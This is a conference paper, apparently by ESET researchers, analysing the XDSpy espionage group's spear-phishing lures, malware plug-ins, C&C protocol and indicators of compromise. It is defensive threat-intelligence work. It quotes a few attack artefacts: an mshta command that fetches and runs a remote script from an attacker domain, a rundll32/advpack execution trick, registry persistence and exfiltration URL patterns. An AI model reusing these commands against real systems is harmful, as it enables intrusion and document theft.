**30 September - 2 October, 2020 / vblocalhost.com** ----- **ABSTRACT** Rare is the APT group that goes largely undetected for nine years, but XDSpy is just that; a previously undocumented espionage group that has been active since 2011. It has attracted very little public attention, with the exception of an advisory from the Belarusian CERT in February 2020. In the interim, the group compromised many government agencies and private companies in Eastern Europe and the Balkans. In this paper, we present our analysis of this nine-year-long espionage campaign, active since 2011, but which apparently went dark in February 2020. With its primary purpose seemingly being cyber espionage, this group stole documents and other sensitive files, such as victims’ mailboxes. These outcomes were achieved through the use of the XDSpy malware ecosystem, composed of at least seven components: XDDown, XDRecon, XDList, XDMonitor, XDUpload, XDLoc and XDPass. As our research has not uncovered links with any previously known APT groups, we have attributed this malware toolset to a previously unknown group. We wish to extend our special thanks to Antti Tikkanen (from Google’s Threat Analysis Group) for the initial tip-off and his help during the investigation. **CAMPAIGN** Our research suggests that this group has been active since at least 2011. We noticed it went dark in February 2020, likely after the Belarus CERT published an advisory [1]. However, we cannot exclude the possibility that it switched to a new malware family or is working on a new campaign. Targets of the XDSpy group are located in Eastern Europe and the Balkans and are primarily government entities, including militaries, ministries of foreign affairs, and private companies. Figure 1 shows the location of known victims according to _ESET telemetry._ _F igure 1: Map of XDSpy victims according to ESET telemetry (Belarus, Moldova, Russia, Serbia and Ukraine)._ XDSpy malware is mostly dedicated to reconnaissance and document theft. It also monitors removable devices and exfiltrates interesting documents from them. Surprisingly, XDSpy’s developers chose to hard code the full paths of the files to be exfiltrated directly into their stealer executables. Thus, we were able to determine some of the documents that were stolen: - Entire Microsoft Outlook mailboxes (OST and PST files) - Various documents (PDF, DOC, XLS, etc.) related to each compromised organization: - Plane tickets, travel reservations - Working documents (research, planning, meetings notes, etc.) - CVs. We also noticed XDSpy operators exfiltrate Google Chrome local data (the indexed DB contains data stored locally by a browser script) for a Ukrainian news agency’s website by uploading the following file: ----- c:\users\admin\appdata\local\google\chrome\user data\default\indexeddb\https_www.ostro.o rg_0. indexeddb.leveldb\current However, we believe this might have been a mistake due to the presence of the .ost string in this file path. The .ost file extension is generally used for Microsoft Outlook mailboxes. XDSpy also exfiltrated documents freely available on the internet such as QuickStartGuide_SanDiskSecureAccessV2.0.pdf. This may indicate that not all exfiltration requests are checked by a human operator but rather rely on an automated system. **ATTRIBUTION** After careful research, we were not able to link XDSpy to any publicly known APT group: - We did not find any code similarity with other malware families - We did not observe any overlap in the network infrastructure - We are not aware of another APT group targeting these specific countries and verticals. Moreover, the group has been active for more than nine years – so, had such an overlap existed, we believe that it would have been noticed, and the group uncovered, a long time ago. Even though the various malware samples don’t show a high level of sophistication in their development, the campaign appears to be well run. Over the nine years of activity, the operators carefully and consistently removed artefacts that could help unmask the developers’ or operators’ origin. We found only one file path artefact; it was in a malicious PowerPoint presentation, but it doesn’t provide much information: C:\Users\D1C20~1.ZHU\AppData\Local\Temp\MicrosoftPowerPoint (2).js We also extracted all the PE compilation timestamps from the 53 samples we discovered. Figure 2 shows the distribution of time-of-day from these samples. We believe that the developers might be working in the UTC+2 or UTC+3 time zone, which is also the time zone of most of the targets. We also noticed they were only working from Monday to Friday, suggesting a professional activity. _F igure 2: XDSpy’s work hours based on PE compilation timestamps._ **TECHNICAL ANALYSIS** **Compromise vector** XDSpy operators mainly seem to use spear-phishing emails in order to compromise their targets. In fact, this is the only compromise vector we are aware of. However, the emails tend to vary a bit: some contain an attachment while others contain a link to a malicious file. The first layer of the malicious file or attachment is generally a ZIP archive. On VirusTotal, we found an XDSpy spear-phishing email that contains a malicious ZIP attachment, as shown in Figure 3. It was sent in August 2015 to an employee of minsvyaz.ru, the Russian Ministry of Digital Development, Communications and Mass Media. ----- _Fi gure 3: Spear-phishing email (partially redacted)._ The email roughly translates to: Subject: The police Lost and Found department found your email address The police Lost and Found department received a plastic file folder with photos and documents. Your emails were found inside. Please check some of the photos in the attachment. If you recognize them you need to contact the police. All found articles are stored by the police for three months after receipt. For each day the owner will be charged 10 rubles. Tatiana Solomatina Lost and Found warehouse employee Moscow Main Department of Internal Affairs Inside the archive is a Microsoft PowerPoint presentation in the PPSX format, as shown in Figure 4, which is automatically displayed in full-screen mode once opened. The first slide is a photograph of a fire safety certificate. _Fig ure 4: First slide of the malicious PowerPoint presentation._ ----- _Figu re 5: Warning from Microsoft PowerPoint when the malicious script is executed._ If the victim allows it, by clicking on ‘Open’ as shown in Figure 5, a malicious script called MicrosoftPowerPoint.js is executed. It will check for network connectivity by making an HTTP GET request to www.yahoo.com. It checks if the returned page contains the string imgsrwe4 (for which we didn’t find any reference) and if not, it drops XDDown, the XDSpy orchestrator, at a hard-coded location. In this case, the hard-coded path is %APPDATA%\WINinit\WINlogon.exe. Continuing, the script also sets up persistence for the XDDown component by adding an entry in the Windows Run registry key at HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Wininit. Finally, XDDown is executed. In 2019 and 2020, we noticed that XDSpy was also sending emails without attachments but with a link, as seen in Figure 6. _Figur e 6: Spear-phishing email sent by XDSpy’s operators in February 2020._ Roughly translated, the body of the email says: Good afternoon! I am sending you a copy of the letter and photo materials based on the results of the work. Click on the link to download: photo materials_11.02.2020.zip We are waiting for an answer until the end of the working day. The URL in the email body contains what appears to be a UUID, to download an archive. The malicious URL (for instance https://filedownload[.]email/filedownload/download.php?u=) was delivering a piece of JavaScript code that prompts for a file download. If accepted, a ZIP archive whose name is the same as the one displayed in the spear-phishing email is downloaded. Since December 2019, the operators have also used the domain downloadsprimary[.]com in a similar fashion. This ZIP archive only contains an LNK file, without any decoy document. When the victim double-clicks on it, the LNK executes the following command line: C:\Windows\system32\mshta.exe "javascript:document.write();GetObject("script: https:// filedownload[.]email/filedownload/download2.php?f=")" We were not able to retrieve the script delivered by this URL but we did see that the result was XDDown being dropped and executed on the victim’s machine. In February 2020, the XDSpy operators also apparently used spear-phishing emails related to the COVID-19 pandemic. On _Facebook [2], we found a photo of a printed email that is linked to the group in the Belarusian CERT advisory [1] via the_ address it was sent from – niipulm@tut[.]by. This email address belongs to the Belarusian Republican Scientific and Practical Center for Pulmonology and Tuberculosis [1]. Because the email says that the first cases of coronavirus were confirmed in Belarus a few weeks before the first official case was actually registered, this photo has been shared multiple times on various social networks while it was really an ----- XDSpy spear-phishing email containing a link to a piece of malware. The printed email, shown in Figure 7, apparently targeted the Belarusian Ministry of Industry. This misinformation was debunked by tut.by, a Belarusian news website [3]. _Figure 7: Spear-phishing email with COVID-19 hook._ **XDDown: the orchestrator[1]** XDDown is the main malware component in the XDSpy toolset, and it manages the various plug-ins responsible for all other functionality. The oldest sample we have found was submitted to VirusTotal in August 2011[2]. It was apparently compiled in July 2011 while the most recent samples were compiled and distributed at the beginning of 2020. Both 32- and 64-bit variants exist in the wild. Figure 8 summarizes the various components used in this campaign. _Figure 8: XDSpy’s malware architecture._ 1 SHA-256: 02A7C7DF31B0A93FC80B053E46DCFA1EEB82EFF79C1C8D802DB31F1D0DB823FD 2 SHA-256: 1529A6791DA28A19F306D008B5DD13AA0341C7586B0B8B056DB7F9E3C79B31C1 ----- **_Persistence_** As we previously mentioned, XDDown persists using a very standard mechanism: a Windows registry Run key (HKCU\Software\Microsoft\Windows\CurrentVersion\Run\). Interestingly, in some cases, the XDDown binary was not executed directly. A trick was used with the Windows utility avpack.dll [4], probably to try to fool EDR or other security products. For example, we have seen XDDown launched using the following command line: C:\Windows\System32\rundll32.exe advpack.dll, RegisterOCX "c:\windows\system32\SndVol. exe\..\..\..\Users\admin\AppData\Local\Temp\Usermode COM Manager.exe" **_Capabilities_** XDDown is nothing but a downloader – hence our chosen name. This architecture choice is quite different from what we see in other APT malware frameworks, which tend to be quite complex with a whole set of backdoor commands and a logging mechanism. On one hand, the XDSpy approach is easier to develop but, on the other hand, it is much less flexible for the operators as a new binary needs to be built, downloaded and executed to perform any action on the compromised machine. **_Network_** XDDown makes regular GET requests to its hard-coded command-and-control (C&C) URL to download its plug-ins, which are Windows DLLs. The payloads are divided into three chunks, so three consecutive GET requests are performed. A very distinctive artefact is that the filename extension in these requests is .xd, where ranges from 1 to 3 or from 4 for 6. In fact, this provides the basis of the name we chose for the APT group using this malware: XDSpy. So, for example, the following URLs will be requested: - http://officeupdtcentr[.]com/2officeupdate/data/.xd1?dbx= - http://officeupdtcentr[.]com/2officeupdate/data/.xd2?dbx= - http://officeupdtcentr[.]com/2officeupdate/data/.xd3?dbx= Then, the three chunks of data received in response are concatenated and decrypted using a two-byte XOR key. From 2011 to 2018, the XOR key was 0x16 0x11 and was changed to 0x31 0x73 in 2019. In the most recent samples, the buffer is then dropped into the file %APPDATA%\Temp.NET\archset.dat (hard coded). Finally, it calls the versionValidation export of the plug-in using the functions LoadLibrary and GetProcAddress. Older variants of XDDown embedded a PE loader, but the most recent versions simply rely on these Windows APIs. The ID, contained in the C&C URL, is generated from the computer name, the username, the initial GetTickCount value and XDDown’s internal version. It uses a Caesar substitution cipher with a right shift of 1 so, for example, admin is encoded into benjo. The final ID is made up of these four shifted values separated by underscores. In the samples we analysed, the version value ranged from V1 to V7 and, in the latest version, which we believe is 12, the version string is just C (12 in hexadecimal representation). Even if the User-Agent is hard coded, the XDSpy developers are apparently using actual, real-world values. For instance, the latest versions use the following User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.93 Safari/537.36. **_Evolution_** We have noticed only minor modifications in the samples between 2011 and 2020. The hard-coded filenames have changed, but the network protocol remains essentially the same. In 2013, some string obfuscation started to be added by first using string-stacking and then also shifting the characters with various offsets. Finally, most of the Windows API functions are resolved dynamically, probably in order to try to thwart detections. **Document stealers** Document stealer plug-ins are downloaded, dropped in %APPDATA%\Temp.NET\archset.dat (this path might be different in other samples), and loaded by XDDown. They all are Windows DLLs with a single export named versionValidation. There is no persistence for any plug-ins, so they need to be re-downloaded every time the user logs in. The samples are apparently compiled just before delivery and the XDSpy operators seem to add and remove code on the fly. This is necessitated by the absence of backdoor commands, as all malicious actions must be hard coded in a plug-in. Most document stealer plug-ins have a kill switch. They exit if the current system time is after some hard-coded limit – for example, November 2020, as shown in Figure 9. ----- _Figure 9: Kill switch if the hard-coded date has passed._ We were able to distinguish four main types of stealer plug-ins that are generally executed in the same order as listed below. They all communicate with the C&C server using the HTTP protocol. **_XDRecon[3]_** This is the most basic type of stealer plug-in. It gathers basic information about the victim machines (computer name, username, volume serial number) and writes it in %APPDATA%\Temp.NET\hdir.dat. It uploads this file to the C&C server and finally deletes it before exiting. **_XDList_** XDList gathers information about the computers’ files. It starts by recursive enumeration of all files on the C: drive, then writes the path of ‘interesting’ files to %APPDATA%\Temp.NET\list.dat. Some folders, such as Program Files, Windows, Temp or Temporary Internet Files, are not crawled, probably in order to reduce the number of files reported. Table 1 lists the file extensions that this plug-in deems interesting. **File extension** **Description – related software** .accdb Microsoft Access .mdb .doc .docm Microsoft Word .docx .xls .xlm Microsoft Excel .xlsx .xlsm .odt OpenDocument Text .ppt .pptm .ppsm Microsoft PowerPoint .pptx .sldm .ost .pst Microsoft Outlook (mailboxes/emails) .msg .eml .pdf Portable Document Format .wab Windows Address Book _Table 1: Extensions reported by XDList._ 3 SHA-256: EECC34C52ECC1A46AB63BA0F9948ECC367C15850BCEF0ED55987EEF9BFEE077B |File extension|Description – related software| |---|---| |.accdb|Microsoft Access| |.mdb|| |.doc|Microsoft Word| |.docm|| |.docx|| |.xls|Microsoft Excel| |.xlm|| |.xlsx|| |.xlsm|| |.odt|OpenDocument Text| |.ppt|Microsoft PowerPoint| |.pptm|| |.ppsm|| |.pptx|| |.sldm|| |.ost|Microsoft Outlook (mailboxes/emails)| |.pst|| |.msg|| |.eml|| |.pdf|Portable Document Format| |.wab|Windows Address Book| ----- It will also exclude files for which the filename contains one of these substrings: .lnk, .wab~, ~, winword.doc, winword2.doc, license, or eula. Once the crawl is finished, the list of interesting files is sent to the hard-coded C&C server. Finally, it will report some more information to the C&C server: - The list of connected drives (name, filesystem type and available space) - The uptime of the machine - A listing of the malware working directory (%APPDATA%\Temp.NET\) - A screenshot taken using the CreateCompatibleBitmap API function. It is RC4-encrypted (the hard-coded key is Eh44UIu39c0s) and zipped before being sent to the C&C server. **_XDMonitor_** XDMonitor is intended to monitor the machine’s activity. It monitors when removable drives are inserted by creating a new hidden window and registering it for device notification (using RegisterDeviceNotificationW and the GUID GUID_ DEVINTERFACE_DISK). When a new drive is inserted, it crawls it recursively. When a file with an interesting extension (the same list as for XDList) is found, it encrypts it using RC4 (the hard-coded key is 1234123412341234) and uploads it to the C&C server. It also takes a screenshot every minute. Unlike the screenshots taken by XDList, the image is not encrypted and is stored in %TEMP%\tmp%YEAR%%MONTH%%DAY%_%TICK_COUNT%.s. The screenshot is uploaded to the C&C immediately after being taken. Finally, XDMonitor sends regular debug messages to the C&C server, as shown in Figure 10. _F igure 10: Regular log messages sent to the C&C server._ It also sends regular POST requests to officeupdtcent[.]com/2officeupdate/data/%ID%.xd1 and officeupdtcentr.com/2officeupdate/data/%ID%.xd4. If the server replies with a 404 code, the malware process stops the monitoring and exits. It is interesting to note that some of the URLs hard coded in this plug-in (like the two we have just mentioned) contain the ID generated per machine. This means the plug-ins are specifically compiled for each different compromised machine. **_XDUpload[4]_** Like XDMonitor, XDUpload monitors removable drives and takes regular screenshots. The additional feature is that it will collect a list of files that are hard coded in the binary, as shown in Figure 11, and then upload the list to the C&C server. It uses %TEMP%\fl637136486220077590.data to keep track of how many files from the static list have been uploaded. We believe that the operators are checking the list of files from the C: drive, sent by XDList, and then selecting the ones that seem most interesting to them for exfiltration. What is surprising is that the paths are directly hard coded in the samples and not retrieved dynamically by a request to the C&C server. Thus, to collect additional files, the operators need to modify their source code, recompile and drop a new version of the plug-in on the victim’s machine. 4 SHA-256: CD28B921B4F4C736E80C817EE7290264E6BBA026E78C1AA87F349959E897F184 ----- _Fi gure 11: Loop uploading a hard-coded list of files to the C&C server (partially redacted)._ **_Network_** All communications with the C&C server use HTTP and the URLs are hard coded in the binaries. Table 2 is a summary of the different URLs used by the plug-ins. **URL** **User-Agent** **Description** http:///lup.php?name= / Upload files and screenshots Mozilla/5.0 (Windows NT 6.1; Upload the files WOW64) AppleWebKit/537.36 http:///tf.php (hex-encoded) containing (KHTML, like Gecko) the directory listing Chrome/45.0.2454.93 Safari/537.36 http:///data/.xd1 Exit the monitoring mode Internet Explorer http:///data/.xd4 when it returns a 404 code http:///tl.php?me=&info=bot, file Report progress of static file Internet Explorer %d of %d (%d %) upload loop (XDUpload) Notify server that the http:///tl.php?me=&info=bot, scr Internet Explorer screenshot loop is running Mozilla/5.0 (Windows NT 6.1; http:///tdb.php?usid=&txt= (KHTML, like Gecko) (XDMonitor) Chrome/45.0.2454.93 Safari/537.36 _Ta ble 2: C&C URLs used by the plug-ins._ Previous versions of the malware used another quite distinctive URL: http:/// whowhat.php?me=. **Other plug-ins and tools** Further to the document stealers we have just described, we have seen the operator deploy a few additional tools. Although our telemetry data shows these tools deployed by XDSpy operators to their victims, it is unclear how these executables are run on the targeted machines. We suspect that another plug-in, or versions of an existing one with additional functionality compiled in for just this purpose, is involved, but has not been identified yet. |URL|User-Agent|Description| |---|---|---| |http:///lup.php?name=|/|Upload files and screenshots| |http:///tf.php|Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.93 Safari/537.36|Upload the files (hex-encoded) containing the directory listing| |http:///data/.xd1 http:///data/.xd4|Internet Explorer|Exit the monitoring mode when it returns a 404 code| |http:///tl.php?me=&info=bot, file %d of %d (%d %)|Internet Explorer|Report progress of static file upload loop (XDUpload)| |http:///tl.php?me=&info=bot, scr|Internet Explorer|Notify server that the screenshot loop is running| |http:///tdb.php?usid=&txt=|Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.93 Safari/537.36|Debug log messages (XDMonitor)| ----- **_XDLoc[5]_** XDLoc is a location discovery plug-in that retrieves a list of nearby Wi-Fi access points. It uses the WlanGetNetworkBssList _Windows API function to retrieve the list of nearby BSSIDs and their signal strengths (RSSI)._ This information is then written in \wgl.dat. We believe that this information can be combined with databases of geolocation of known Wi-Fi access points in order to approximate the location of the victim’s device. **_XDPass[6]_** XDPass is a quite standard browser password stealer, and it has similar custom obfuscation to the other plug-ins. It can recover passwords from Internet Explorer, Chrome and Opera. We did not see significant code similarity with known password stealers, but we cannot exclude that it might be based on some generic code. **_NirSoft_** We also see a wide range of NirSoft [2] tools being deployed, most of them used to grab passwords from various applications. We have seen the following tools: - ChromePass - PassFox - IEPassView - MailPassView - NetPass - Protected Storage PassView - OperaPassView. **CONCLUSION** XDSpy has flown under the radar for almost nine years while conducting cyber espionage operations against governments and private companies in Eastern Europe and the Balkans. The group focuses on the exfiltration of documents stored on the victims’ machines and on removable drives. The various pieces of malware are relatively simple and don’t show the use of advanced techniques, yet are effective. It would be interesting to know if the development choices, such as hard coding file paths in XDUpload, were informed decisions or if they show a lack of malware development skills. **REFERENCES** [1] Belarusian Republican Scientific and Practical Center for Pulmonology and Tuberculosis. http://www.rnpcpf.by/en/ contacts.html. [2] NirSoft. https://www.nirsoft.net/. [3] CERT.by. Кампания по рассылке вредоносного ПО (обновлено). 21 02 2020. https://cert.by/?p=1458. [4] Facebook. COVID-19 printed email on Facebook. https://web.archive.org/web/20200601161019/https://www. facebook.com/Sericof/posts/3329971377030439. [5] Колос, T. Осторожно, фейк. Почему не стоит верить «письму от белорусского медучреждения» о коронавирусе. 02 03 2020. https://42.tut.by/674726. [6] LOLBAS. Advpack.dll. https://lolbas-project.github.io/lolbas/Libraries/Advpack/. 5 SHA-256: 82C08697466EF64866AF6D41936D6231307E09BC75EACE4E7FEE371EBC2EB1EF 6 SHA-256: 7E9EF76744E1F7684A3E47F349E9D71A35C07B3DDEA4A34943A1FA9C3FCD5DBF ----- **INDICATORS OF COMPROMISE (IOCs)** **Hashes** **SHA-256** 8805EB0EFE56F2BE0B0E79AD1EEF24EF47E8A7317D6C7F4 EF38DA375E092F882 F44DE9AB07E40123C4884556DBCA2EDBD7B20172CD70AB 6328B71F5BF95140B7 02A7C7DF31B0A93FC80B053E46DCFA1EEB82EFF79C1C8D 802DB31F1D0DB823FD 1529A6791DA28A19F306D008B5DD13AA0341C7586B0B8B0 56DB7F9E3C79B31C1 EECC34C52ECC1A46AB63BA0F9948ECC367C15850BCEF0E D55987EEF9BFEE077B CD28B921B4F4C736E80C817EE7290264E6BBA026E78C1AA 87F349959E897F184 479CE515CACF8DB6C6543276CAB20B25B6DD87CC03A304 1B103530ABBB4648E1 82C08697466EF64866AF6D41936D6231307E09BC75EACE4E 7FEE371EBC2EB1EF 7E9EF76744E1F7684A3E47F349E9D71A35C07B3DDEA4A34 943A1FA9C3FCD5DBF **Filenames** - %APPDATA%\Temp.NET\archset.dat - %APPDATA%\Temp.NET\hdir.dat - %APPDATA%\Temp.NET\list.dat - %TEMP%\tmp%YEAR%%MONTH%%DAY%_%TICK_COUNT%.s - %TEMP%\fl637136486220077590.data - wgl.dat **Networks** **_Used in 2019-2020_** boborux[.]com daftsync[.]com documentsklad[.]com downloadsprimary[.]com dropsklad[.]com easytosay[.]org filedownload[.]email getthatupdate[.]com officeupdtcentr[.]com wildboarcontest[.]com **_Old network infrastructure_** 62.213.213[.]170 93.63.198[.]40 95.215.60[.]53 |Hashes|Col2|Col3| |---|---|---| |SHA-256|ESET detection name|Component| |8805EB0EFE56F2BE0B0E79AD1EEF24EF47E8A7317D6C7F4 EF38DA375E092F882|JS/TrojanDropper.Agent.OAZ|Spear-phishing email (2015)| |F44DE9AB07E40123C4884556DBCA2EDBD7B20172CD70AB 6328B71F5BF95140B7|LNK/TrojanDownloader.Agent.YJ|Malicious LNK downloader| |02A7C7DF31B0A93FC80B053E46DCFA1EEB82EFF79C1C8D 802DB31F1D0DB823FD|Win64/Agent.VB|XDDown| |1529A6791DA28A19F306D008B5DD13AA0341C7586B0B8B0 56DB7F9E3C79B31C1|Win32/Agent.ABQB|XDDown (oldest known sample)| |EECC34C52ECC1A46AB63BA0F9948ECC367C15850BCEF0E D55987EEF9BFEE077B|Win64/Spy.Agent.CC|XDRecon| |CD28B921B4F4C736E80C817EE7290264E6BBA026E78C1AA 87F349959E897F184|Win64/Spy.Agent.CC|XDUpload| |479CE515CACF8DB6C6543276CAB20B25B6DD87CC03A304 1B103530ABBB4648E1|Win64/Spy.Agent.CC|XDUpload| |82C08697466EF64866AF6D41936D6231307E09BC75EACE4E 7FEE371EBC2EB1EF|Win32/Agent.ABYL|XDLoc| |7E9EF76744E1F7684A3E47F349E9D71A35C07B3DDEA4A34 943A1FA9C3FCD5DBF|Win32/PSW.Agent.OJS|XDPass| ----- forgeron[.]tk jahre999[.]tk omgtech.000space[.]com podzim[.]tk porfavor876[.]tk replacerc.000space[.]com settimana987[.]tk -----